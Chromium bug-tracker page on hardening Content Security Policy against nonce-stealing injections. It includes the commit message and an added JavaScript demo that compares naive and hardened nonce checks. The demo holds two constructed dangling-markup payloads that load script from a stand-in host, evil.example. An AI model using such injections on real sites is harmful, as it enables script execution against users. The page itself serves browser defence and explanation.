
Issue 639293 link

Starred by 1 user

Issue metadata

Status: Started
Owner:
Buried. Ping if important.
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Feature

CSP: Harden against nonce-stealing injections.

Project Member Reported by mkwst@chromium.org, Aug 19 2016

Issue description

Experiment along the lines of https://github.com/w3c/webappsec-csp/issues/98 to prevent nonce-stealing injections.
 
Project Member

Comment 1 by bugdroid1@chromium.org, Aug 31 2016

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/91dc56cc74916618193dfad3f72c448ad21089cf

commit 91dc56cc74916618193dfad3f72c448ad21089cf
Author: mkwst <mkwst@chromium.org>
Date: Wed Aug 31 15:07:48 2016

CSP: Experimentally harden against nonce-stealing injections.

As discussed in https://github.com/w3c/webappsec-csp/issues/98, this
patch prevents execution of script via a nonce if an attribute named
"<script" or "<style" is present, or if an attribute's value contains
"<script" or "<style".

That is, given `script-src 'nonce-abc'`, the following will execute:

    <script nonce=abc>
      // yay
    </script>

But the following will not:

    <script <script nonce=abc>
      // yay
    </script>
    <script attribute="<script" nonce=abc>
      // yay
    </script>
    <script <style nonce=abc>
      // yay
    </script>
    <script attribute="<style" nonce=abc>
      // yay
    </script>

Let's see if this is web-compatible, shall we? This patch locks the new
behavior behind the experimental flag, and adds metrics that should
help us understand what the real-world impact would be.

BUG=639293

Review-Url: https://codereview.chromium.org/2260103003
Cr-Commit-Position: refs/heads/master@{#415633}

[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/LayoutTests/http/tests/security/contentSecurityPolicy/nonces/script-enforce-blocked.php
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/dom/ScriptLoader.cpp
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.cpp
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/third_party/WebKit/Source/core/frame/csp/ContentSecurityPolicy.h
[modify] https://crrev.com/91dc56cc74916618193dfad3f72c448ad21089cf/tools/metrics/histograms/histograms.xml
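
The commit message above explains the heuristic but not how a dangling-markup injection ends up with `<script` as an attribute name or value in the first place. The following is an added example written for this page, not Chromium's ScriptLoader code and not the patch itself: a simplified HTML5 start-tag tokenizer, the pre-hardening nonce check beside the hardened one, and two constructed injections that reproduce the commit's attribute-name and attribute-value cases. The page markup, the nonce `abc`, the host `evil.example` and the function names are all assumptions; substring matching for `<script`/`<style` is this example's choice (the commit's four cases are satisfied under either reading).

```javascript
// Added example (not Chromium's ScriptLoader code): a simplified HTML5
// start-tag tokenizer plus the nonce-hijacking check described in the commit
// message. The page markup, nonce and injection strings are constructed.

// Whitespace as the HTML tokenizer defines it.
const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\f' || c === '\r';

// Tokenize the start tag beginning at html[pos]. Mirrors the HTML5 attribute
// states closely enough for this demonstration: in "before attribute name" a
// '<' starts a new attribute name (a parse error the browser recovers from),
// a name runs until whitespace, '/', '>' or '=', an unquoted value runs until
// whitespace or '>', a quoted value runs to the matching quote, and a stray
// '/' is dropped. Duplicate attributes keep the first occurrence, as browsers do.
function tokenizeStartTag(html, pos) {
  if (html[pos] !== '<') throw new Error('expected a start tag at ' + pos);
  let i = pos + 1;
  let tagName = '';
  while (i < html.length && !isWs(html[i]) && html[i] !== '>' && html[i] !== '/') tagName += html[i++];
  const attrs = [];
  let closed = false;
  while (i < html.length) {
    while (i < html.length && (isWs(html[i]) || html[i] === '/')) i++;
    if (i >= html.length) break;
    if (html[i] === '>') { i++; closed = true; break; }
    let name = '';
    while (i < html.length && !isWs(html[i]) && html[i] !== '/' && html[i] !== '>' && html[i] !== '=') name += html[i++];
    while (i < html.length && isWs(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && isWs(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) value += html[i++];
        i++; // consume the closing quote
      } else {
        while (i < html.length && !isWs(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    name = name.toLowerCase();
    if (!attrs.some(([n]) => n === name)) attrs.push([name, value]);
  }
  return { tagName: tagName.toLowerCase(), attrs, closed, end: i };
}

// Attributes of the first <script> start tag in a document.
function firstScriptAttrs(html) {
  const at = html.toLowerCase().indexOf('<script');
  return at < 0 ? null : tokenizeStartTag(html, at).attrs;
}

// Pre-hardening behaviour: any element carrying the policy's nonce runs.
function naiveNonceCheck(attrs, policyNonce) {
  const nonce = attrs.find(([n]) => n === 'nonce');
  return nonce !== undefined && nonce[1] === policyNonce;
}

// The hardening from the commit: the nonce is honoured only if no attribute
// name or value contains "<script" or "<style" (ASCII case-insensitive), the
// fingerprint of a dangling start tag that swallowed a following tag.
function hardenedNonceCheck(attrs, policyNonce) {
  if (!naiveNonceCheck(attrs, policyNonce)) return false;
  const marker = /<script|<style/;
  return attrs.every(([name, value]) => !marker.test(name.toLowerCase()) && !marker.test(value.toLowerCase()));
}

// Constructed page: untrusted text lands directly before the nonced script
// with no '>' in between, which is exactly what a dangling injection needs.
const POLICY_NONCE = 'abc'; // constructed; real nonces are fresh per response
const LEGIT_TAGS = {
  unquoted: `<script nonce=${POLICY_NONCE}>app.boot();</script>`,
  quoted: `<script src="/app.js" nonce="${POLICY_NONCE}"></script>`,
};
function renderPage(untrusted, style) {
  return `<p>Hello, ${untrusted}\n${LEGIT_TAGS[style]}`;
}

// Two constructed injections matching the commit's two cases. The first leaves
// its start tag open, so the legitimate "<script" is parsed as an attribute
// *name* and nonce=abc as the attacker's attribute. The second opens a quoted
// value that swallows the legitimate tag up to its first quote, so
// "<script src=" becomes an attribute *value* and nonce="abc" again lands on
// the attacker's element.
const INJECT_OPEN_TAG = '<script src=//evil.example/x.js ';
const INJECT_OPEN_QUOTE = '<script src=//evil.example/x.js a="';

function demo() {
  const results = {};
  for (const [label, untrusted, style] of [
    ['benign', 'Mallory', 'unquoted'],
    ['name-steal', INJECT_OPEN_TAG, 'unquoted'],
    ['value-steal', INJECT_OPEN_QUOTE, 'quoted'],
  ]) {
    const attrs = firstScriptAttrs(renderPage(untrusted, style));
    results[label] = {
      attrs,
      naive: naiveNonceCheck(attrs, POLICY_NONCE),
      hardened: hardenedNonceCheck(attrs, POLICY_NONCE),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running `demo()` shows both stolen-nonce elements passing the naive check and failing the hardened one, while the benign page passes both. The flip side is the web-compat question the commit raises: a legitimate nonced script with an attribute value such as `data-tpl="<script>"` also loses its nonce under this rule, which is why the change shipped behind the experimental flag with use counters. The same `<script`/`<style` attribute heuristic later appears in the CSP3 "Is element nonceable?" algorithm.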

Comment 2 by est...@chromium.org, Nov 10 2017

Labels: Hotlist-EnamelAndFriendsFixIt

Comment 3 by est...@chromium.org, Feb 18 2018

Labels: -Hotlist-EnamelAndFriendsFixIt
